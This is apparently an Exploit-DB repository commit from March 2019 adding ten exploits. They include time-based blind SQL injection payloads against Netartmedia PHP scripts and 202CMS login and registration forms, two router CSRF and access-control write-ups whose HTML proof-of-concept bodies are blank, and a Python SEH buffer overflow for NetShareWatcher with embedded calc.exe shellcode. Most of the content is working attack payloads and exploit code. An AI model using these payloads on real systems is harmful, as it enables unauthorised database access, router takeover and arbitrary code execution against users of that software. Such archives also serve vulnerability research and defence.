From 7bd54d5a917250977eeeb69d17f6bf3de4fa490f Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 21 Mar 2019 05:02:08 +0000
Subject: [PATCH] DB: 2019-03-21
10 changes to exploits/shellcodes
NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow
Netartmedia PHP Car Dealer - SQL Injection
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
Netartmedia Jobs Portal 6.1 - SQL Injection
Netartmedia PHP Dating Site - SQL Injection
Netartmedia PHP Business Directory 4.2 - SQL Injection
202CMS v10beta - Multiple SQL Injection
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery
Netartmedia Deals Portal - 'Email' SQL Injection
---
 exploits/hardware/webapps/46580.txt | 70 +++++++++++++++++++++++++++++
 exploits/hardware/webapps/46581.txt | 50 +++++++++++++++++++++
 exploits/php/webapps/46573.txt | 20 +++++++++
 exploits/php/webapps/46574.txt | 17 +++++++
 exploits/php/webapps/46575.txt | 14 ++++++
 exploits/php/webapps/46576.txt | 16 +++++++
 exploits/php/webapps/46577.txt | 13 ++++++
 exploits/php/webapps/46579.txt | 50 +++++++++++++++++++++
 exploits/php/webapps/46582.txt | 13 ++++++
 exploits/windows/local/46578.py | 52 +++++++++++++++++++++
 files_exploits.csv | 10 +++++
 11 files changed, 325 insertions(+)
 create mode 100644 exploits/hardware/webapps/46580.txt
 create mode 100644 exploits/hardware/webapps/46581.txt
 create mode 100644 exploits/php/webapps/46573.txt
 create mode 100644 exploits/php/webapps/46574.txt
 create mode 100644 exploits/php/webapps/46575.txt
 create mode 100644 exploits/php/webapps/46576.txt
 create mode 100644 exploits/php/webapps/46577.txt
 create mode 100644 exploits/php/webapps/46579.txt
 create mode 100644 exploits/php/webapps/46582.txt
 create mode 100755 exploits/windows/local/46578.py
diff --git a/exploits/hardware/webapps/46580.txt b/exploits/hardware/webapps/46580.txt
new file mode 100644
index 000000000..055047a90
--- /dev/null
+++ b/exploits/hardware/webapps/46580.txt
@@ -0,0 +1,70 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access
+Control
+# Date: 14/01/2019
+# Exploit Author: Kumar Saurav
+# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/
+# Vendor: ChinaMobile
+# Category: Hardware
+# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
+# Tested on: Windows
+# CVE : CVE-2019-6279
+
+#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with
+firmware
+W2001EN-00 have an Incorrect Access Control vulnerability via the
+cgi-bin/webproc?getpage=html/index.html
+subpage=wlsecurity URI, allowing an Attacker to change the Wireless
+Security Password.
+
+Reproduction Steps:
+Step 1: Building a malicious html web page
+Step 2: Attacker’s wants to change the wireless security (WPA/WPA2) key to
+“PSWDmatlo331#@!” (in my case)
+
+Step 3: (192.168.59.254 in my Case)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+Step 4: save this as Incorrect_Access_Control.html
+Step 5: Planting this malicious web page (Incorrect_Access_Control.html)
+that are likely to be visited by the victim’s (by social engineering) or
+any user connected in the Access Point (AP) will have to visit this page or
+any attacker’s connected in the AP will trigger this exploit.
+Step 6: After execution of above exploit, wireless security (WPA/WPA2) key
+will change!!
+
+Note: This vulnerability allowing an attacker to reproduce without login.
\ No newline at end of file
diff --git a/exploits/hardware/webapps/46581.txt b/exploits/hardware/webapps/46581.txt
new file mode 100644
index 000000000..1c1362638
--- /dev/null
+++ b/exploits/hardware/webapps/46581.txt
@@ -0,0 +1,50 @@
+# Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery (CSRF)
+# Date: 14/01/2019
+# Exploit Author: Kumar Saurav
+# Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/
+# Vendor: ChinaMobile
+# Category: Hardware
+# Version: GPN2.4P21-C-CN (Firmware: W2001EN-00)
+# Tested on: Windows
+# CVE : CVE-2019-6282
+
+#Description: ChinaMobile PLC Wireless Router GPN2.4P21-C-CN devices with firmware
+W2001EN-00 have CSRF vulnerability via the cgi-bin/webproc?getpage=html/index.html
+subpage=wlsecurity URI, allowing an Attacker to change the Wireless Security Password.
+
+#Reproduction Steps:
+
+Note: This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
+
+Step 1: User login to PLC wireless router
+
+Step 2: User visits the attacker's malicious web page (PLC_CSRF.html)
+
+Step 3: PLC_CSRF.html exploits CSRF vulnerability and changes the wireless Security (WPA/WPA2) key to "PSWDmatlo331#@!"
+
+Step 4: (192.168.59.254 in my Case)
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/46573.txt b/exploits/php/webapps/46573.txt
new file mode 100644
index 000000000..16e16fb79
--- /dev/null
+++ b/exploits/php/webapps/46573.txt
@@ -0,0 +1,20 @@
+# Exploit Title: Netartmedia PHP Car Dealer- SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/autodealer/
+# Demo Site: https://www.phpscriptdemos.com/autodealer/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+# Description:The PHP Car Dealer script is also using a flexible
+template system - the
+ templates can be modified or new ones to be created in order to
+completely customize the website look and feel.
+
+----- PoC 1 SQLi -----
+
+Request: http://localhost/[PATH]/index.php
+
+Parameter features[] (POST)
+
+Payload:body_style=&car_make=&car_model=1&condition=&exterior_color=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&fuel_type=&max_mileage=&mod=search&only_pictures=1&order_by=date&price_from=1&price_to=1&search_keyword=&search_type=search_form&transmission=&type=1&year=
\ No newline at end of file
diff --git a/exploits/php/webapps/46574.txt b/exploits/php/webapps/46574.txt
new file mode 100644
index 000000000..8cfb41f56
--- /dev/null
+++ b/exploits/php/webapps/46574.txt
@@ -0,0 +1,17 @@
+# Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/propertyagency/
+# Demo Site: https://www.phpscriptdemos.com/agency/
+# Version: 4.0
+# Tested on: Kali Linux
+# CVE: N/A
+# Description:PHP Real Estate Agency is a web software written in PHP
+especially designed for real estate agencies to help create quickly
+and launch their own websites with their listings and information on
+it.
+----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/index.php
+Parameter: features[] (POST)
+Payload: ad_type=&bathrooms=&bedrooms=&features[]=(select(0)from(select(sleep(0)))v)/*'%2B(select(0)from(select(sleep(0)))v)%2B'"%2B(select(0)from(select(sleep(0)))v)%2B"*/&field_location=1&listing_type=&location=&mod=search&only_pictures=1&order_by=date&pfield51_0=1&pfield51_1=1&pfield51_2=1&price_from=1&price_to=1&search_keyword=&search_type=search_form&size_from=1&size_to=1&type=1&zip=94102&zip_distance=94102&zip_radius=1&zip_type=1
\ No newline at end of file
diff --git a/exploits/php/webapps/46575.txt b/exploits/php/webapps/46575.txt
new file mode 100644
index 000000000..c6231f857
--- /dev/null
+++ b/exploits/php/webapps/46575.txt
@@ -0,0 +1,14 @@
+# Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/jobsportal/
+# Demo Site: https://www.ittjobs.com/
+# Version: 6.1
+# Tested on: Kali Linux
+# CVE: N/A
+
+----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/loginaction.php
+Parameter: Email (POST)
+Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
\ No newline at end of file
diff --git a/exploits/php/webapps/46576.txt b/exploits/php/webapps/46576.txt
new file mode 100644
index 000000000..67c3f4b33
--- /dev/null
+++ b/exploits/php/webapps/46576.txt
@@ -0,0 +1,16 @@
+# Exploit Title: Netartmedia Php Dating Site - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.netartmedia.net/datingsite/
+# Demo Site: https://www.phpscriptdemos.com/dating/
+# Version: Lastest
+# Tested on: Kali Linux
+# CVE: N/A
+# Description: PHP Dating Site is a complete web system for creating
+advanced and modern online dating websites.
+
+ ----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/loginaction.php
+Parameter: Email (POST)
+Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
\ No newline at end of file
diff --git a/exploits/php/webapps/46577.txt b/exploits/php/webapps/46577.txt
new file mode 100644
index 000000000..abed1a348
--- /dev/null
+++ b/exploits/php/webapps/46577.txt
@@ -0,0 +1,13 @@
+# Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection
+# Date: 19.03.2019
+# Exploit Author: Ahmet Ümit BAYRAM
+# Vendor Homepage: https://www.phpbusinessdirectory.com/
+# Demo Site: https://www.bizwebdirectory.com/
+# Version: 4.2
+# Tested on: Kali Linux
+# CVE: N/A
+ ----- PoC SQLi -----
+
+Request: http://localhost/[PATH]/USERS/loginaction.php
+Parameter: Email (POST)
+Payload: Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login
\ No newline at end of file
diff --git a/exploits/php/webapps/46579.txt b/exploits/php/webapps/46579.txt
new file mode 100644
index 000000000..540d0377a
--- /dev/null
+++ b/exploits/php/webapps/46579.txt
@@ -0,0 +1,50 @@ +=========================================================================================== +# Exploit Title: 202CMS - 'log_user' SQL Inj. +# Dork: N/A +# Date: 20-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://sourceforge.net/projects/b202cms/ +# Software Link: https://sourceforge.net/projects/b202cms/ +# Version: v10 beta +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: 202CMS is small, but functionally CMS. It is based +on Twitter Bootstrap + This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is +highly customizable + and extremely easy to setup. The script is not finished, but soon I'm +going to finish it. +=========================================================================================== +# POC - SQLi (blind) +# Parameters : log_user +# Attack Pattern : +1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f +# POST Method : http://localhost/202cms10beta/index.php +=========================================================================================== +########################################################################################### +=========================================================================================== +# Exploit Title: 202CMS - 'register.php' SQL Inj. +# Dork: N/A +# Date: 20-03-2019 +# Exploit Author: Mehmet EMIROGLU +# Vendor Homepage: https://sourceforge.net/projects/b202cms/ +# Software Link: https://sourceforge.net/projects/b202cms/ +# Version: v10 beta +# Category: Webapps +# Tested on: Wamp64, Windows +# CVE: N/A +# Software Description: 202CMS is small, but functionally CMS. It is based +on Twitter Bootstrap + This CMS was built by Konrad and is powered by MySQLi and PHP. 202CMS is +highly customizable + and extremely easy to setup. The script is not finished, but soon I'm +going to finish it. 
+=========================================================================================== +# POC - SQLi (blind) +# Parameters : register.php, reg_user,reg_mail +# Attack Pattern : +1+%2b+((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2f*%27XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%27%7c%22XOR(((SELECT+1+FROM+(SELECT+SLEEP(25))A)))OR%22*%2f +# Attack Pattern : %27%2b((SELECT+1+FROM+(SELECT+SLEEP(25))A))%2b%27 +# POST Method : http://localhost/202cms10beta/register.php +=========================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/46582.txt b/exploits/php/webapps/46582.txt new file mode 100644 index 000000000..a791e12b3 --- /dev/null +++ b/exploits/php/webapps/46582.txt @@ -0,0 +1,13 @@ +# Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection +# Date: 20.03.2019 +# Exploit Author: Ahmet Ümit BAYRAM +# Vendor Homepage: https://www.netartmedia.net/dealsportal/ +# Demo Site: https://www.phpscriptdemos.com/deals/i +# Version: Lastest +# Tested on: Kali Linux +# CVE: N/A +----- PoC: SQLi ----- +# Request: http://localhost/[PATH]/loginaction.php +# Vulnerable Parameter: Email (POST) +# Attack Pattern: +Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login \ No newline at end of file diff --git a/exploits/windows/local/46578.py b/exploits/windows/local/46578.py new file mode 100755 index 000000000..6047c5777 --- /dev/null +++ b/exploits/windows/local/46578.py 
@@ -0,0 +1,52 @@
+# Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow
+# Date: 2019-03-19
+# Vendor Homepage: http://netsharewatcher.nsauditor.com
+# Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatcher_setup.exe
+# Exploit Author: Peyman Forouzan
+# Tested Version: 1.5.8.0
+# Tested on: Windows XP SP2 - SP3
+
+# 1- Run python code : NetShareWatcher.py
+# 2- Open Exploit.txt and copy content to clipboard
+# 3- Open NetShareWatcher
+# 4- Setting --> Defaults --> Restrictions --> Add --> Custome
+# 5- Paste the content of Exploit.txt into the box
+# 6- Click 'Find'
+# 7- Calc.exe Open ( Can be replaced with Shellcode )
+
+#!/usr/bin/python
+
+buffer = "\x41" * 262
+nseh = "\xeb\x14\x90\x90" # Overwrite Next Seh With Short jmp
+seh = "\x90\xBF\xC9\x74" # Overwrite Seh / pop esi pop ebx retn [OLEACC.dll]
+nops = "\x90" * 20
+
+# Calc.exe payload [size 227]
+buf =""
+buf += "\xdb\xcf\xb8\x27\x17\x16\x1f\xd9\x74\x24\xf4\x5f\x2b\xc9"
+buf += "\xb1\x33\x31\x47\x17\x83\xef\xfc\x03\x60\x04\xf4\xea\x92"
+buf += "\xc2\x71\x14\x6a\x13\xe2\x9c\x8f\x22\x30\xfa\xc4\x17\x84"
+buf += "\x88\x88\x9b\x6f\xdc\x38\x2f\x1d\xc9\x4f\x98\xa8\x2f\x7e"
+buf += "\x19\x1d\xf0\x2c\xd9\x3f\x8c\x2e\x0e\xe0\xad\xe1\x43\xe1"
+buf += "\xea\x1f\xab\xb3\xa3\x54\x1e\x24\xc7\x28\xa3\x45\x07\x27"
+buf += "\x9b\x3d\x22\xf7\x68\xf4\x2d\x27\xc0\x83\x66\xdf\x6a\xcb"
+buf += "\x56\xde\xbf\x0f\xaa\xa9\xb4\xe4\x58\x28\x1d\x35\xa0\x1b"
+buf += "\x61\x9a\x9f\x94\x6c\xe2\xd8\x12\x8f\x91\x12\x61\x32\xa2"
+buf += "\xe0\x18\xe8\x27\xf5\xba\x7b\x9f\xdd\x3b\xaf\x46\x95\x37"
+buf += "\x04\x0c\xf1\x5b\x9b\xc1\x89\x67\x10\xe4\x5d\xee\x62\xc3"
+buf += "\x79\xab\x31\x6a\xdb\x11\x97\x93\x3b\xfd\x48\x36\x37\xef"
+buf += "\x9d\x40\x1a\x65\x63\xc0\x20\xc0\x63\xda\x2a\x62\x0c\xeb"
+buf += "\xa1\xed\x4b\xf4\x63\x4a\xa3\xbe\x2e\xfa\x2c\x67\xbb\xbf"
+buf += "\x30\x98\x11\x83\x4c\x1b\x90\x7b\xab\x03\xd1\x7e\xf7\x83"
+buf += "\x09\xf2\x68\x66\x2e\xa1\x89\xa3\x4d\x24\x1a\x2f\xbc\xc3"
+buf += "\x9a\xca\xc0";
+
+payload = buffer + nseh + seh + nops + buf
+try:
+ f=open("Exploit.txt","w")
+ print "[+] Creating %s bytes payload.." %len(payload)
+ f.write(payload)
+ f.close()
+ print "[+] File created!"
+except:
+ print "File can't be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 39689bdb1..80de45bd2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -10371,6 +10371,7 @@ id,file,description,date,author,type,platform,port
 46536,exploits/windows/local/46536.txt,"Microsoft Windows MSHTML Engine - _Edit_ Remote Code Execution",2019-03-13,"Eduardo Braun Prado",local,windows,
 46552,exploits/windows/local/46552.py,"WinRAR 5.61 - Path Traversal",2019-02-22,WyAtu,local,windows,
 46561,exploits/windows/local/46561.py,"Advanced Host Monitor 11.92 beta - Local Buffer Overflow",2019-03-19,"Peyman Forouzan",local,windows,
+46578,exploits/windows/local/46578.py,"NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow",2019-03-20,"Peyman Forouzan",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -41015,3 +41016,12 @@ id,file,description,date,author,type,platform,port
 46560,exploits/php/webapps/46560.txt,"Netartmedia Event Portal 2.0 - 'Email' SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
 46562,exploits/php/webapps/46562.txt,"Netartmedia PHP Mall 4.1 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
 46563,exploits/php/webapps/46563.txt,"Netartmedia Real Estate Portal 5.0 - SQL Injection",2019-03-19,"Ahmet Ümit BAYRAM",webapps,php,80
+46573,exploits/php/webapps/46573.txt,"Netartmedia PHP Car Dealer - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46574,exploits/php/webapps/46574.txt,"Netartmedia PHP Real Estate Agency 4.0 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46575,exploits/php/webapps/46575.txt,"Netartmedia Jobs Portal 6.1 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46576,exploits/php/webapps/46576.txt,"Netartmedia PHP Dating Site - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46577,exploits/php/webapps/46577.txt,"Netartmedia PHP Business Directory 4.2 - SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80
+46579,exploits/php/webapps/46579.txt,"202CMS v10beta - Multiple SQL Injection",2019-03-20,"Mehmet EMIROGLU",webapps,php,80
+46580,exploits/hardware/webapps/46580.txt,"PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control",2019-03-20,"Kumar Saurav",webapps,hardware,80
+46581,exploits/hardware/webapps/46581.txt,"PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery",2019-03-20,"Kumar Saurav",webapps,hardware,80
+46582,exploits/php/webapps/46582.txt,"Netartmedia Deals Portal - 'Email' SQL Injection",2019-03-20,"Ahmet Ümit BAYRAM",webapps,php,80